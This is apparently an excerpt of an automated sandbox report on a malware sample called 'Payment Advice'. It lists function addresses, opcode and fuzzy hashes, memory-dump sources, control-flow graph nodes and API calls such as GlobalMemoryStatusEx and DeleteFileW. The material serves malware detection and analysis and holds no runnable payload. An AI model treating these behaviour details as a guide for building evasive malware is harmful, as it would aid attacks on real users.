                                                                                      • Instruction Fuzzy Hash: 89C080BDA18248DFC7114F00DC04759BF32AB4A141F0055C1BC1557213DA305D50CF71
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A7409 Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b2cc341af1a407a043af1dcf8f504ca64fa3c37fd4540ef4849244de3f90fd8
                                                                                      • Instruction ID: 64b49103c1655dbaf3991a9739a78bc19bbc04e842f4cc2a84e0a01a8fa3529a
                                                                                      • Opcode Fuzzy Hash: 0b2cc341af1a407a043af1dcf8f504ca64fa3c37fd4540ef4849244de3f90fd8
                                                                                      • Instruction Fuzzy Hash: 98C08C5232DBC1AFE303C3348825568AF3189A320078C00CAC2D1DB06BC0085029C37B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A6B04 Relevance: .0, Instructions: 8COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8839dd83f4ad517daa4b6ea98c17d89388a4c09f4f5322731a1ce056a036bc99
                                                                                      • Instruction ID: 29d317ad661ff6b6354b439215f351f90f8493c67c4e3ad08c58666b4244d164
                                                                                      • Opcode Fuzzy Hash: 8839dd83f4ad517daa4b6ea98c17d89388a4c09f4f5322731a1ce056a036bc99
                                                                                      • Instruction Fuzzy Hash: 23B012A62E4600F2640033B4899882BDD10EFF3B40F70DD217345C0014C421C8A8D577
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 077A8508 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T+-q$[V~*$[V~*$]\`
                                                                                      • API String ID: 0-1849991408
                                                                                      • Opcode ID: 9e2da5e69dcdd454c09170d26e8f735b3e6cdef1a08f5b8ff5566e5ac5b617e4
                                                                                      • Instruction ID: 48511bf3701a5c667fa9b01397783d859055d21e1331ed6bd079103b11212fb5
                                                                                      • Opcode Fuzzy Hash: 9e2da5e69dcdd454c09170d26e8f735b3e6cdef1a08f5b8ff5566e5ac5b617e4
                                                                                      • Instruction Fuzzy Hash: 38B139B0E152199BDB44CFAAD58089EFBF2FF99340F14D62AD815BB318E73099018F55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 05C8D560 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1718316976.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5c80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 82ac707eacf077be044bafac0d4a115dfdc0d54786e7263561867ec54adf7683
                                                                                      • Instruction ID: f52c4863c9d82fa65554faa7f9e2cbf03a591bcfa4aef45bc23dc86a6dda469f
                                                                                      • Opcode Fuzzy Hash: 82ac707eacf077be044bafac0d4a115dfdc0d54786e7263561867ec54adf7683
                                                                                      • Instruction Fuzzy Hash: DD21DBB1E016189BEB18DFABD85079EFBF3AFC8200F14C07AD509A6254EB305A45CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AECC8 Relevance: .3, Instructions: 323COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a71d929de960c9423bec2bd961a09c866877796e8d57cb652230c636e6ce5b12
                                                                                      • Instruction ID: 27a8b4cf9d22b61436e9893e3bb4e1838570601d34a27de0c5f4bab86ed0dd7b
                                                                                      • Opcode Fuzzy Hash: a71d929de960c9423bec2bd961a09c866877796e8d57cb652230c636e6ce5b12
                                                                                      • Instruction Fuzzy Hash: 6DE11CB4E041199FDB14DFA9C5809AEFBF2FF89304F248269D404A735ADB71A941CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AF548 Relevance: .3, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73b029d3aee8a5f178fe41907ba64d726ca8228a6f2fda286fa16fb77dc1e854
                                                                                      • Instruction ID: bc1c715a54eeefff5d54e50680d87c0d42aee5e1d38cb6b81b913b81c0752664
                                                                                      • Opcode Fuzzy Hash: 73b029d3aee8a5f178fe41907ba64d726ca8228a6f2fda286fa16fb77dc1e854
                                                                                      • Instruction Fuzzy Hash: 26E11EB4E001199FDB14DFA9D5809AEFBF2FF89304F248169E414A735ADB31A941CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AF110 Relevance: .3, Instructions: 312COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bcc4a18386b2819dff08e4cd42cd36e18115ec74261f906f7b6a4b4780e89cd9
                                                                                      • Instruction ID: 039f98ca42948c4642c64c37d469648dc460e99db354472d54ac6a41ec35d67f
                                                                                      • Opcode Fuzzy Hash: bcc4a18386b2819dff08e4cd42cd36e18115ec74261f906f7b6a4b4780e89cd9
                                                                                      • Instruction Fuzzy Hash: 94E12DB4E041199FDB14DFA9D5809AEFBF2FF89304F248259D414A735ADB31A941CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A6560 Relevance: .3, Instructions: 264COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b9f2e0a437e64367af3725925609577b01d10551844ef925dbbe617b8a78e701
                                                                                      • Instruction ID: 0f78066687ed5ec1ff95908e007806b3551301ccc1cdd8d34484731c38bcebab
                                                                                      • Opcode Fuzzy Hash: b9f2e0a437e64367af3725925609577b01d10551844ef925dbbe617b8a78e701
                                                                                      • Instruction Fuzzy Hash: 8BD1E93182075A8ECB10EB64D994AADB7B1FFD5300F11879AE54977214EF70AAC5CF81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A1DE0 Relevance: .2, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 81d9dde15c2c997688643f9c736db685c367298f2c049d7fb6d1db9ea46a6e46
                                                                                      • Instruction ID: 7106115ea49ac66f4ee296c8f9b901e0dcdb5b9f79086573f7b1fc5b065f59c0
                                                                                      • Opcode Fuzzy Hash: 81d9dde15c2c997688643f9c736db685c367298f2c049d7fb6d1db9ea46a6e46
                                                                                      • Instruction Fuzzy Hash: 4E81FFB4E14219DFDB44CFA9C5849AEFBF2FF89251F14956AE415AB320D330AA02CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A1DD0 Relevance: .2, Instructions: 182COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c121bb580dcae3f61a4076bd27a14c77d7f5ecc3d57b25b5bf396f8571ea24a7
                                                                                      • Instruction ID: 868f2382bf26b3a51ee79ebed9949ce51eec0ce217ab7e7a756d02405e1eb960
                                                                                      • Opcode Fuzzy Hash: c121bb580dcae3f61a4076bd27a14c77d7f5ecc3d57b25b5bf396f8571ea24a7
                                                                                      • Instruction Fuzzy Hash: C2810F74E1421ADFDB44CFA9C58499EBBF2FF89251F14956AE415AB320D330AA02CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AA518 Relevance: .2, Instructions: 176COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d13666fe32b88432d69f52e507fa6c9744681c2bc320824d237244abb30735d5
                                                                                      • Instruction ID: 01c5961f4d75f5ecb2d114d5f69244fdc0deb37681f831d6d1dcbefac9ba332a
                                                                                      • Opcode Fuzzy Hash: d13666fe32b88432d69f52e507fa6c9744681c2bc320824d237244abb30735d5
                                                                                      • Instruction Fuzzy Hash: 6551B092A5F3E06EEB076B3C59710D63F708D5325670B42DBC4C0CA0BBE599894CC7AA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 05C8EDC0 Relevance: .2, Instructions: 171COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1718316976.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_5c80000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe84e49dab391237f40904bb554802efaccfc32b35b86abed1815d219cbada4f
                                                                                      • Instruction ID: 8e63c7d34919f01c636e009a698fdb65f6effdcb02ad85cb09800ed8298cb92c
                                                                                      • Opcode Fuzzy Hash: fe84e49dab391237f40904bb554802efaccfc32b35b86abed1815d219cbada4f
                                                                                      • Instruction Fuzzy Hash: 40711774E0520ADFCB04DF9AD4859EEFBB6FB88310F10892AE415AB354D7349A41CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A2C98 Relevance: .2, Instructions: 153COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b4aaf698c76884ce69db46992b7f63d78b634c913e34226451d29ac88a2cc7e
                                                                                      • Instruction ID: 4a5a432d55edce26bf0e98b5e44f51dea511acd8b11a3d80abe0914854231981
                                                                                      • Opcode Fuzzy Hash: 0b4aaf698c76884ce69db46992b7f63d78b634c913e34226451d29ac88a2cc7e
                                                                                      • Instruction Fuzzy Hash: F56115B5E1420AEFDB04CFAAC9815EEFBB2BF89340F14C51AD425A7201D734AA41CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A5248 Relevance: .1, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bc7e833524c60f1526d89da4ffc98aaeaaa43bd0534dea576425e623b138b2b4
                                                                                      • Instruction ID: 37a697f532a57dba9aadc5fcd5245dc07b07673c441df44c6acb2131fe87de27
                                                                                      • Opcode Fuzzy Hash: bc7e833524c60f1526d89da4ffc98aaeaaa43bd0534dea576425e623b138b2b4
                                                                                      • Instruction Fuzzy Hash: 375149B0E1520ADFDB04CFAAD4855AEFBF2EF89350F20942AE405E7354D7349A518F94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077AF538 Relevance: .1, Instructions: 134COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ad5d5015de8209c1ad8ee050e719cebd0e6bbf3473f99b76fe1d9480fb308da4
                                                                                      • Instruction ID: 217407ebe83971b3b5e6432726eca968081517120259a5706d463882ba94f5dc
                                                                                      • Opcode Fuzzy Hash: ad5d5015de8209c1ad8ee050e719cebd0e6bbf3473f99b76fe1d9480fb308da4
                                                                                      • Instruction Fuzzy Hash: 2C514DB0E042199FDB14DFA9D5805AEFBF2BF89304F24C269D418AB356DB319941CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 077A3008 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1719882744.00000000077A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_77a0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24de66439186c420747847b56fc99f6f1b749cb8be64a7626bafbf4ba71ebcdd
                                                                                      • Instruction ID: 08552accdb76ece6fbaa4d2d4f531bceb4ab255e24d880a9bfdb9583fc111a44
                                                                                      • Opcode Fuzzy Hash: 24de66439186c420747847b56fc99f6f1b749cb8be64a7626bafbf4ba71ebcdd
                                                                                      • Instruction Fuzzy Hash: 504107B0E1160AEFDB08CFAAC4815EEFBF2BF89340F14D52AC415A7205D7749A418FA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:13.6%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:32
                                                                                      Total number of Limit Nodes:6
                                                                                      execution_graph 29315 f80848 29317 f8084e 29315->29317 29316 f8091b 29317->29316 29320 f81392 29317->29320 29325 f814b7 29317->29325 29322 f813a6 29320->29322 29321 f814b4 29321->29317 29322->29321 29324 f814b7 2 API calls 29322->29324 29331 f88348 29322->29331 29324->29322 29327 f813a6 29325->29327 29328 f814bf 29325->29328 29326 f814b4 29326->29317 29327->29326 29329 f88348 2 API calls 29327->29329 29330 f814b7 2 API calls 29327->29330 29328->29317 29329->29327 29330->29327 29332 f88352 29331->29332 29333 f8836c 29332->29333 29336 68efa58 29332->29336 29340 68efa68 29332->29340 29333->29322 29338 68efa68 29336->29338 29337 68efc92 29337->29333 29338->29337 29339 68efca9 GlobalMemoryStatusEx GlobalMemoryStatusEx 29338->29339 29339->29338 29342 68efa7d 29340->29342 29341 68efc92 29341->29333 29342->29341 29343 68efca9 GlobalMemoryStatusEx GlobalMemoryStatusEx 29342->29343 29343->29342 29311 f88170 29312 f881b6 DeleteFileW 29311->29312 29314 f881ef 29312->29314 29344 6010ff8 29346 6011014 29344->29346 29345 601111e 29346->29345 29347 68efa58 GlobalMemoryStatusEx GlobalMemoryStatusEx 29346->29347 29348 68efa68 GlobalMemoryStatusEx GlobalMemoryStatusEx 29346->29348 29347->29346 29348->29346

                                                                                      Executed Functions

                                                                                      Function 068EB250 Relevance: 8.3, Strings: 6, Instructions: 771COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: 514aba7f9ed196025e1fa56827f87b7373ae21449b250e4fcc0be83d293e77ba
                                                                                      • Instruction ID: 34dc76210d03300dfcff43524b1fedf8a68e93792156d39e792cb2c396de1f85
                                                                                      • Opcode Fuzzy Hash: 514aba7f9ed196025e1fa56827f87b7373ae21449b250e4fcc0be83d293e77ba
                                                                                      • Instruction Fuzzy Hash: 7D526D30E102098FDF64DB68D6807ADB7F6EB86314F20892AE505EB355DB35DC85CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E3480 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 416 68e3480-68e34a1 418 68e34a3-68e34a6 416->418 419 68e34ac-68e34cb 418->419 420 68e3c47-68e3c4a 418->420 429 68e34cd-68e34d0 419->429 430 68e34e4-68e34ee 419->430 421 68e3c4c-68e3c6b 420->421 422 68e3c70-68e3c72 420->422 421->422 424 68e3c79-68e3c7c 422->424 425 68e3c74 422->425 424->418 426 68e3c82-68e3c8b 424->426 425->424 429->430 432 68e34d2-68e34e2 429->432 434 68e34f4-68e3503 430->434 432->434 546 68e3505 call 68e3c98 434->546 547 68e3505 call 68e3ca0 434->547 436 68e350a-68e350f 437 68e351c-68e37f9 436->437 438 68e3511-68e3517 436->438 459 68e37ff-68e38ae 437->459 460 68e3c39-68e3c46 437->460 438->426 469 68e38d7 459->469 470 68e38b0-68e38d5 459->470 472 68e38e0-68e38f3 call 68e306c 469->472 470->472 475 68e38f9-68e391b call 68e3078 472->475 476 68e3c20-68e3c2c 472->476 475->476 480 68e3921-68e392b 475->480 476->459 477 68e3c32 476->477 477->460 480->476 481 68e3931-68e393c 480->481 481->476 482 68e3942-68e3a18 481->482 494 68e3a1a-68e3a1c 482->494 495 68e3a26-68e3a56 482->495 494->495 499 68e3a58-68e3a5a 495->499 500 68e3a64-68e3a70 495->500 499->500 501 68e3a72-68e3a76 500->501 502 68e3ad0-68e3ad4 500->502 501->502 503 68e3a78-68e3aa2 501->503 504 68e3ada-68e3b16 502->504 505 68e3c11-68e3c1a 502->505 512 68e3aa4-68e3aa6 503->512 513 68e3ab0-68e3acd call 68e3084 503->513 516 68e3b18-68e3b1a 504->516 517 68e3b24-68e3b32 504->517 505->476 505->482 512->513 513->502 516->517 520 68e3b49-68e3b54 517->520 521 68e3b34-68e3b3f 517->521 524 68e3b6c-68e3b7d 520->524 525 68e3b56-68e3b5c 520->525 521->520 526 68e3b41 521->526 530 68e3b7f-68e3b85 524->530 531 68e3b95-68e3ba1 524->531 527 68e3b5e 525->527 528 68e3b60-68e3b62 525->528 526->520 527->524 528->524 532 68e3b89-68e3b8b 530->532 533 68e3b87 530->533 535 68e3bb9-68e3c0a 531->535 536 68e3ba3-68e3ba9 531->536 532->531 533->531 535->505 537 68e3bad-68e3baf 536->537 538 68e3bab 536->538 537->535 538->535 546->436 547->436
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: 843c1a675546479240058bdfd347a4c576b21b546465bfacb1a42ba1ab101d7b
                                                                                      • Instruction ID: a495a1787756c1681392d54400ddd34b50288236d60a8c4b234fccc7f2a5825b
                                                                                      • Opcode Fuzzy Hash: 843c1a675546479240058bdfd347a4c576b21b546465bfacb1a42ba1ab101d7b
                                                                                      • Instruction Fuzzy Hash: 21323F31E1071A8FCB14EF75C89459DB7B6BFC9300F5086AAD449AB225EB70ED85CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E7D90 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 924 68e7d90-68e7dae 925 68e7db0-68e7db3 924->925 926 68e7dd6-68e7dd9 925->926 927 68e7db5-68e7dd1 925->927 930 68e7dda-68e7de5 926->930 931 68e7de6-68e7de9 926->931 927->926 932 68e7deb-68e7df9 931->932 933 68e7e00-68e7e03 931->933 940 68e7e36-68e7e4c 932->940 941 68e7dfb 932->941 935 68e7e24-68e7e26 933->935 936 68e7e05-68e7e1f 933->936 937 68e7e2d-68e7e30 935->937 938 68e7e28 935->938 936->935 937->925 937->940 938->937 945 68e8067-68e8071 940->945 946 68e7e52-68e7e5b 940->946 941->933 947 68e8072-68e8086 946->947 948 68e7e61-68e7e7e 946->948 951 68e808d-68e80a7 947->951 952 68e8088-68e808c 947->952 957 68e8054-68e8061 948->957 958 68e7e84-68e7eac 948->958 953 68e80a9-68e80ac 951->953 952->951 955 68e82d8-68e82db 953->955 956 68e80b2-68e80c1 953->956 959 68e8392-68e8395 955->959 960 68e82e1-68e82ed 955->960 965 68e80c3-68e80de 956->965 966 68e80e0-68e811b 956->966 957->945 957->946 958->957 975 68e7eb2-68e7ebb 958->975 962 68e83b8-68e83ba 959->962 963 68e8397-68e83b3 959->963 967 68e82f8-68e82fa 960->967 968 68e83bc 962->968 969 68e83c1-68e83c4 962->969 963->962 965->966 984 68e82ac-68e82c2 966->984 985 68e8121-68e8132 966->985 973 68e82fc-68e8302 967->973 974 68e8312-68e8319 967->974 968->969 969->953 971 68e83ca-68e83d3 969->971 978 68e8306-68e8308 973->978 979 68e8304 973->979 980 68e832a 974->980 981 68e831b-68e8328 974->981 975->947 982 68e7ec1-68e7edd 975->982 978->974 979->974 983 68e832f-68e8331 980->983 981->983 996 68e8042-68e804e 982->996 997 68e7ee3-68e7f0d 982->997 987 68e8348-68e8381 983->987 988 68e8333-68e8336 983->988 984->955 994 68e8138-68e8155 985->994 995 68e8297-68e82a6 985->995 987->956 1009 68e8387-68e8391 987->1009 988->971 994->995 1006 68e815b-68e8251 call 68e65b8 994->1006 995->984 995->985 996->957 996->975 1011 68e8038-68e803d 997->1011 1012 68e7f13-68e7f3b 997->1012 1060 68e825f 1006->1060 1061 68e8253-68e825d 1006->1061 1011->996 1012->1011 1018 68e7f41-68e7f6f 1012->1018 1018->1011 1024 68e7f75-68e7f7e 1018->1024 1024->1011 1025 68e7f84-68e7fb6 1024->1025 1033 68e7fb8-68e7fbc 1025->1033 1034 68e7fc1-68e7fdd 1025->1034 1033->1011 1035 68e7fbe 1033->1035 1034->996 1036 68e7fdf-68e8036 call 68e65b8 1034->1036 1035->1034 1036->996 1062 68e8264-68e8266 1060->1062 1061->1062 1062->995 1063 68e8268-68e826d 1062->1063 1064 68e826f-68e8279 1063->1064 1065 68e827b 1063->1065 1066 68e8280-68e8282 1064->1066 1065->1066 1066->995 1067 68e8284-68e8290 1066->1067 1067->995
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 8928505d83b3e9a04f9a6b5a004e887a2c603e73ccbc920c2e684434a531c4a8
                                                                                      • Instruction ID: 4255edc2000dd5d672113a110086490f21a395b615ad76fead09c99856a68946
                                                                                      • Opcode Fuzzy Hash: 8928505d83b3e9a04f9a6b5a004e887a2c603e73ccbc920c2e684434a531c4a8
                                                                                      • Instruction Fuzzy Hash: 48028A70B002099FDB54DF78D590AAEB7E2AF89304F148569D509EB395DB31EC86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E0040 Relevance: 2.1, Instructions: 2056COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.4177120492.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_8_2_68e0000_Payment Advice.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f0eea6d1871e09fc1b295150b2655392784de17673c55a84267b889f54502b21
                                                                                      • Instruction ID: 52e9abaf91f86caaba3e9d296a82c281e221650948a6a55a89653cb19ce3f871
                                                                                      • Opcode Fuzzy Hash: f0eea6d1871e09fc1b295150b2655392784de17673c55a84267b889f54502b21
                                                                                      • Instruction Fuzzy Hash: 4A230B31D10B198ECB11EF68C8945ADF7B1FF99300F14D69AE459B7221EB70AAC5CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068E55C0 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
